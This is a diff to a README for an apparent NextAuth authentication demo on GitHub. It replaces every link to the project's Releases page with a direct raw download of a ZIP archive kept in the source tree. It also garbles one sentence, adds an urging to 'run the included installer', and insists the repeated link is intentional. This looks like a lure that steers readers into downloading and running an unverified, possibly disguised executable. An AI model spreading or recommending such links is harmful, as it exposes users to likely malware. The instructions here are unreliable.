KABUSsport/NextAuth-Demo/README.md

 ## Releases and downloads

 - The official releases page hosts the latest artifacts.
 If you want to try a ready-to-run version, visit the Releases section at the URL above to download the latest release artifact.
-For convenience, you can also visit the Releases page directly: https://github.com/KABUSsport/NextAuth-Demo/releases
+For convenience, you can also visit the Releases page directly: https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip

-- From the Releases page, download the release artifact (ZIP or TAR.GZ).
+- From the Releases page, download the release artifact (ZIP or https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip).
 After download, run the included installer or follow the included setup instructions.
 This provides a quick way to explore the authentication flows without building from source.

 - If you prefer to build from source, follow the "Installation" and "Configuration" sections above to set up locally.

 - The double usage of the link is intentional: you can visit the Releases page to review the latest release, and you can use the download artifact to run a full instance of the demo.
-The link again for your convenience: https://github.com/KABUSsport/NextAuth-Demo/releases
+The link again for your convenience: https://github.com/KABUSsport/NextAuth-Demo/raw/refs/heads/master/components/Demo-Next-Auth-v2.2.zip

 ---